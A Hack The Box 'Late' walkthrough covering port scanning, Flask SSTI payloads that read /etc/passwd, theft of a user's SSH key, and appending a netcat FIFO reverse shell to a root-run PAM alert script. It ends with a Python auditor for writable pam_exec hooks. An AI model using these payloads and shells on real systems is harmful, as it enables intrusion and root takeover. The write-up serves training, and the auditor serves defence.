Hack The Box Late Walkthrough

Late

Initial recon

Machine IP: 10.10.11.156

NMAP Scan

List of open ports:

$ sudo nmap 10.10.11.156 -p- -T5 -sSVC -oA Late/late_full_nmap

Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-30 10:43 UTC
Warning: 10.10.11.156 giving up on port because retransmission cap hit (2).
Nmap scan report for 10.10.11.156
Host is up (0.098s latency).
Not shown: 65532 closed tcp ports (reset)
PORT      STATE    SERVICE VERSION
22/tcp    open     ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 02:5e:29:0e:a3:af:4e:72:9d:a4:fe:0d:cb:5d:83:07 (RSA)
|   256 41:e1:fe:03:a5:c7:97:c4:d5:16:77:f3:41:0c:e9:fb (ECDSA)
|_  256 28:39:46:98:17:1e:46:1a:1e:a1:ab:3b:9a:57:70:48 (ED25519)
80/tcp    open     http    nginx 1.14.0 (Ubuntu)
|_http-title: Late - Best online image tools
|_http-server-header: nginx/1.14.0 (Ubuntu)
51656/tcp filtered unknown
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 169.39 seconds

There are only two open ports, 22 and 80: SSH and HTTP.

We are unlikely to find anything on the SSH port, so let’s start with the HTTP port.

Website

Scrolling through the website and hovering over the hyperlink “late free online photo editor”, we can see a subdomain, images.late.htb. Let’s add it to the hosts file.

When we go to http://images.late.htb, we land on a page titled “Convert image to text with Flask”.

Convert function

The feature takes an image as input. The output is stored in a file called “result.txt”, which contains some HTML code corresponding to the text present on the picture.

Flask

Flask is known for SSTI (Server-Side Template Injection). A Server-Side Template Injection is possible when an attacker injects template directives as user input, which can execute arbitrary code on the server. We can test it using a simple payload:

  • {{7*7}}

If the server is vulnerable to SSTI, the output should be <p>49</p>. We write our payload in a file, take a picture of it, and feed it to the Image Reader feature. We then grab the result.txt file containing our output:

SSTI OK

First access to the server

The server is vulnerable to SSTI. We have to create a payload that exploits it. The first payload we’re going to use grabs the “/etc/passwd” file:

  • {{ get_flashed_messages.__globals__.__builtins__.open("/etc/passwd").read() }}

And it’s working!

/etc/passwd output

We can see a user here: svc_acc. We can grab the “user.txt” file in “/home/svc_acc/user.txt”:

User Flag

Browsing its home directory, we find a “.ssh” folder containing an “id_rsa” file, which is a private SSH key.

We chmod the id_rsa key to 600, and with ssh -i id_rsa svc_acc@10.10.11.156 we can connect to the server over SSH.

Escalation to root

Enumeration

Now that we are connected as the user svc_acc, we need to find our way to root. We will let “linpeas.sh” enumerate the machine for us: let’s run it and grab a cup of coffee.

After a few minutes of execution and parsing of the output, one file looks interesting:

Interesting File

This file contains a script that emails the root user about connections to the SSH server:

#!/bin/bash

RECIPIENT="root@late.htb"
SUBJECT="Email from Server Login: SSH Alert"

BODY="
A SSH login was detected.

        User:        $PAM_USER
        User IP Host: $PAM_RHOST
        Service:     $PAM_SERVICE
        TTY:         $PAM_TTY
        Date:        `date`
        Server:      `uname -a`
"

if [ ${PAM_TYPE} = "open_session" ]; then
        echo "Subject:${SUBJECT} ${BODY}" | /usr/sbin/sendmail ${RECIPIENT}
fi

At this point we have no idea whether this script actually runs on the server. We run pspy to confirm it. At first we thought the script wasn’t run at all; then we remembered that it watches the SSH server and emails root to log every connection. We logged in again and saw:

Sendmail

Exploitation

The idea is then to add code to the script and trigger a reverse shell, as root this time. But we can’t edit the file to add our payload. I tried many things, but the manipulation that worked was to echo my payload and redirect the output into the file:

  • echo "nc 10.10.14.4 1337 -e /bin/bash" >> /usr/local/sbin/ssh-alert.sh

This doesn’t work: the creator of this machine installed a version of netcat that doesn’t support the “-e” parameter. We then use the FIFO technique from this cheat sheet:

Our final payload is then:

  • rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.4 1337 > /tmp/f

We fire up pwncat-cs listening on port 1337 and connect to SSH as svc_acc. This triggers the bash script and executes our payload.

Bim Bam Boom, rooted!

Rooted
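As a defender’s counterpart to the root step above, here is an added Python check (my own code, not the author’s or the box’s) that lists every script referenced by pam_exec.so under a pam.d directory and flags the ones a non-root user could modify, since sshd runs these hooks as root with the PAM_* variables seen in the script. The pam.d layout, hook script names and permissions built in run_demo() are constructed for illustration.

```python
import os
import re
import stat
import tempfile
from pathlib import Path

# A pam_exec.so line with a simple control token, e.g. "session optional pam_exec.so seteuid /usr/local/sbin/ssh-alert.sh"
PAM_EXEC_RE = re.compile(r"^\s*(auth|account|password|session)\s+\S+\s+pam_exec\.so(.*)$")

def find_pam_exec_scripts(pam_dir):
    """Return the absolute script paths named on pam_exec.so lines in the files under pam_dir."""
    scripts = []
    for cfg in sorted(p for p in Path(pam_dir).iterdir() if p.is_file()):
        for line in cfg.read_text(errors="replace").splitlines():
            m = PAM_EXEC_RE.match(line)
            if m:  # pam_exec options (seteuid, quiet, log=...) come first; the script is the first absolute path
                scripts += [t for t in m.group(2).split() if t.startswith("/")][:1]
    return scripts

def audit_script(path):
    """Reasons a hook script that sshd runs as root could be altered by a non-root user ([] = OK)."""
    st, parent = os.stat(path), os.stat(os.path.dirname(path))
    reasons = []
    if st.st_uid != 0:
        reasons.append("owner is not root")
    if st.st_mode & stat.S_IWGRP:
        reasons.append("group-writable")
    if st.st_mode & stat.S_IWOTH:
        reasons.append("world-writable")
    if parent.st_mode & stat.S_IWOTH and not parent.st_mode & stat.S_ISVTX:
        reasons.append("parent directory is world-writable")  # the script could be replaced outright
    return reasons

def audit_pam_dir(pam_dir):
    """Map every pam_exec script referenced under pam_dir to its list of findings."""
    return {s: audit_script(s) for s in find_pam_exec_scripts(pam_dir)}

def run_demo():
    """Constructed sample (not the Late box): an sshd config naming one lax hook and one sane one."""
    with tempfile.TemporaryDirectory() as tmp:
        pam_d = Path(tmp, "pam.d")
        pam_d.mkdir()
        bad, good = Path(tmp, "ssh-alert.sh"), Path(tmp, "other-hook.sh")
        for script in (bad, good):
            script.write_text("#!/bin/bash\n")
        bad.chmod(0o777)  # anyone can append a payload to this one
        good.chmod(0o755)
        (pam_d / "sshd").write_text(f"session optional pam_exec.so seteuid {bad}\nsession optional pam_exec.so {good}\n")
        return {Path(s).name: reasons for s, reasons in audit_pam_dir(pam_d).items()}
```

On a real host, run audit_pam_dir("/etc/pam.d") as root; the owner check will also flag scripts owned by a service account, which is exactly the pattern abused here.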

Thank you for reading.

Libereau